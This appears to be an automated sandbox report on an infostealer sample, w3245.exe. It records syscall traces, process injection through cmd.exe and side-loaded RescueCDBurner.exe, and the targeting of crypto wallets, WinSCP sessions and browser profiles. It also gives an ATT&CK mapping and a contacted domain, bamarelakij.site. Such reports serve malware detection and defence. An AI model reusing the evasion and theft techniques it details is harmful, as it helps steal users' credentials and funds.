Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtQueryInformationProcess: Direct from: 0x7FF6692CD833
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6692A6D35
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6691BE314
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtReadVirtualMemory: Direct from: 0x7FF66931A355
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtQueryValueKey: Direct from: 0x7FF6692770E4
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FFE221C26A1
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtReadVirtualMemory: Direct from: 0x7FF66931A5AB
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF669320A7D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtDelayExecution: Direct from: 0x7FF66933A57E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6691D0D97
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtReadVirtualMemory: Direct from: 0x7FF669315A4D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x14011D808
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF669273116
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF66926C79D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtCreateFile: Direct from: 0x7FF6693C3A6A
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6693371E7
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtQueryInformationProcess: Direct from: 0x7FF669258A19
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF669373324
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF66926BC49
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6691BE65D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtEnumerateValueKey: Direct from: 0x7FF66930465D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF66937449D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF66925362E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtClose: Direct from: 0x7FF6693C7FEB
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6692EE0D3
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6691BA692
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtReadVirtualMemory: Direct from: 0x7FF6693237A6
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtSetInformationProcess: Direct from: 0x7FF669248E5D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtEnumerateKey: Direct from: 0x7FF6693C890F
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | NtQuerySystemInformation: Direct from: 0x76EF63E1
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtMapViewOfSection: Direct from: 0x7FF6693C696A
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtReadFile: Direct from: 0x7FF66924CDCA
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtQueryValueKey: Direct from: 0x7FF669276DE3
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtTerminateProcess: Direct from: 0x7FF6692575ED
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtQueryValueKey: Direct from: 0x7FF669277E48
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtReadVirtualMemory: Direct from: 0x7FF6693C37DB
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtReadVirtualMemory: Direct from: 0x7FF66931552D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtSetInformationProcess: Direct from: 0x7FF669375120
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6691C35D2
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtClose: Direct from: 0x7FF6693C5B8E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtSetInformationProcess: Direct from: 0x7FF669258340
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FFE221E4B5E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF66932363D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF66926BCC0
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtSetInformationProcess: Direct from: 0x7FF669314AC4
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6691BACA7
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtReadVirtualMemory: Direct from: 0x7FF669315183
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6692A1072
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtQueryInformationProcess: Direct from: 0x7FF66924D346
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtCreateThreadEx: Direct from: 0x7FF6691B3FB0
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtDelayExecution: Direct from: 0x7FF66934012A
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtMapViewOfSection: Direct from: 0x7FF66923F4BE
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtSetInformationThread: Direct from: 0x7FF6693D09CE
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF669374A40
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtClose: Direct from: 0x7FF669258C3E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF669254A3D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtQueryValueKey: Direct from: 0x7FF6692763B7
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtQueryInformationProcess: Direct from: 0x7FF6693148B3
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF66932B955
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtReadVirtualMemory: Direct from: 0x7FF66931A520
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtDelayExecution: Direct from: 0x7FF66933EC2D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6692A319E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtClose: Direct from: 0x7FF6692A5F50
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF669248AA9
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtCreateThreadEx: Direct from: 0x7FF6691B41BF
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6691C399F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF669318ADD
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtSetInformationProcess: Direct from: 0x7FF669314987
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6691BC4D3
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtSetInformationProcess: Direct from: 0x7FF669259496
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6691C6355
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtReadFile: Direct from: 0x14011D832
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtDeviceIoControlFile: Direct from: 0x7FF6692D7976
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtCreateFile: Direct from: 0x7FF6693C5B77
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF66931A9B6
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtCreateFile: Direct from: 0x14011D7A4
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF66931CCA7
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF669349C9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF66931E7C5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6691BE868Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6693C6D98Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeNtSetInformationThread: Direct from: 0x6CDC7B9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6692D5700Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF6693233DFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x140120A3CJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 398010Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 33B010Jump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3EE0F _LogonUser_@24,SetLastError,newMultiByteFromWideChar,newMultiByteFromWideChar,newMultiByteFromWideChar,LogonUserA,GlobalFree,GlobalFree,GlobalFree,1_2_5BB3EE0F
Source: C:\Users\user\Desktop\w3245.exeProcess created: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe "C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=540 -burn.filehandle.self=528 Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00801719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,0_2_00801719
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00803A5F AllocateAndInitializeSid,CheckTokenMembership,0_2_00803A5F
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: RescueCDBurner.exe, 00000002.00000002.1716390154.000000006C49E000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: nBlChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: RescueCDBurner.exe, 00000003.00000002.1776972727.000000006B68E000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: nakChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007EEC07 cpuid 0_2_007EEC07
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: _GetLocaleInfo_@16,SetLastError,newMultiByteFromWideCharSize,GetLocaleInfoA,MultiByteToWideChar,GlobalFree,1_2_5BB32D1A
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,2_2_6BD873B4
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_6BDFF356
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_6BDFF2EF
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,2_2_6BD852E4
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,2_2_6BD87270
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,2_2_6BD8767A
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,2_2_6BD8750C
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007D4EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,0_2_007D4EDF
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007C6037 GetSystemTime,GetDateFormatW,GetLastError,GetLastError,GetDateFormatW,GetLastError,0_2_007C6037
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007C61DF GetUserNameW,GetLastError,0_2_007C61DF
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0080887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,0_2_0080887B
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007C5195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,0_2_007C5195
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2233114676.0000000000546000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2167001213.0000000000546000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2233114676.0000000000546000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: wallets\Exodus\exodus.wallet
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2233114676.0000000000546000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: Exodus\exodus.wallet
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2167001213.0000000000546000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: r\??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets#
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Directory queried: C:\Users\user\Documents\DTBZGIOOSO

Mitre Att&ck Matrix

Techniques mapped from the signatures above, grouped by tactic; the number in parentheses is the count of matching signatures. Only techniques with at least one match are listed.

Initial Access: Valid Accounts (2)
Execution: Native API (4), Command and Scripting Interpreter (3), Service Execution (2)
Persistence: DLL Side-Loading (11), Create Account (1), Valid Accounts (2), Windows Service (4), Registry Run Keys / Startup Folder (1)
Privilege Escalation: Abuse Elevation Control Mechanism (1), DLL Side-Loading (11), Valid Accounts (2), Access Token Manipulation (21), Windows Service (4), Process Injection (213), Registry Run Keys / Startup Folder (1)
Defense Evasion: Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (4), Software Packing (1), DLL Side-Loading (11), File Deletion (1), Masquerading (21), Valid Accounts (2), Virtualization/Sandbox Evasion (11), Access Token Manipulation (21), Process Injection (213), Indicator Removal (1)
Credential Access: OS Credential Dumping (1), Credentials in Registry (1)
Discovery: System Time Discovery (12), Account Discovery (1), System Service Discovery (1), File and Directory Discovery (14), System Information Discovery (147), Security Software Discovery (121), Process Discovery (2), Virtualization/Sandbox Evasion (11), System Owner/User Discovery (1)
Collection: Archive Collected Data (11), Data from Local System (21)
Command and Control: Ingress Tool Transfer (1), Encrypted Channel (21), Non-Application Layer Protocol (3), Application Layer Protocol (14)
Reconnaissance, Resource Development, Lateral Movement, Exfiltration, Impact: no technique mapped
Behavior Graph

Behavior Graph ID: 1584991 | Sample: w3245.exe | Start date: 06/01/2025 | Architecture: WINDOWS | Score: 80

Start (node 2): DNS/IP: fg.microsoft.map.fastly.net, bamarelakij.site. Signature: AI detected suspicious sample. Starts w3245.exe (13), RescueCDBurner.exe (16), msedge.exe (19) and 2 other processes (22).
  w3245.exe (13): drops C:\Windows\Temp\...\w3245.exe (PE32); starts w3245.exe (24).
    w3245.exe (24): drops C:\Windows\Temp\...\RescueCDBurner.exe, C:\Windows\Temp\...\msvcr100.dll, C:\Windows\Temp\...\msvcp100.dll (all PE32) and 6 other files (none is malicious); starts RescueCDBurner.exe (43).
      RescueCDBurner.exe (43): drops C:\Users\user\AppData\...\RescueCDBurner.exe, C:\Users\user\AppData\...\msvcr100.dll, C:\Users\user\AppData\...\msvcp100.dll (all PE32) and 5 other files (none is malicious). Signatures: Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR). Starts RescueCDBurner.exe (51).
        RescueCDBurner.exe (51): Signatures: Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR). Starts cmd.exe (54).
          cmd.exe (54): drops C:\Users\user\...\LocalCtrl_alpha_v3.exe (PE32+), C:\Users\user\AppData\Local\Temp\xbsvw (PE32+). Signatures: Writes to foreign memory regions; Found hidden mapped module (file has been removed from disk); Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces. Starts LocalCtrl_alpha_v3.exe (58), conhost.exe (62).
            LocalCtrl_alpha_v3.exe (58): DNS/IP: bamarelakij.site 104.21.80.52 (ports 443, 49739, 49740; CLOUDFLARENETUS, United States). Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); 2 other signatures. Starts msedge.exe (64).
              msedge.exe (64): starts msedge.exe (66).
  RescueCDBurner.exe (16): Signature: Maps a DLL or memory area into another process. Starts cmd.exe (27).
    cmd.exe (27): drops C:\Users\user\AppData\Local\...\lshbkgxootar (PE32+). Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process. Starts conhost.exe (47), LocalCtrl_alpha_v3.exe (49).
  msedge.exe (19): DNS/IP: 192.168.2.4 (ports 138, 443, 49723; unknown), 239.255.255.250 (Reserved). Starts msedge.exe (30), msedge.exe (33), msedge.exe (35) and 3 other processes (41).
    msedge.exe (30): DNS/IP: 20.110.205.119 (ports 443, 49856), 20.189.173.4 (ports 443, 49847, 49878), both MICROSOFT-CORP-MSN-AS-BLOCKUS, United States; 16 other IPs or domains.
  2 other processes (22): start msedge.exe (37), msedge.exe (39).

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label | Link
w3245.exe | 3% | ReversingLabs | |

Dropped Files
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | 3% | ReversingLabs | |
C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dll | 0% | ReversingLabs | |
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtCore4.dll | 0% | ReversingLabs | |
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtGui4.dll | 0% | ReversingLabs | |
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtNetwork4.dll | 0% | ReversingLabs | |
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtXml4.dll | 0% | ReversingLabs | |
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | 3% | ReversingLabs | |
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\StarBurn.dll | 0% | ReversingLabs | |
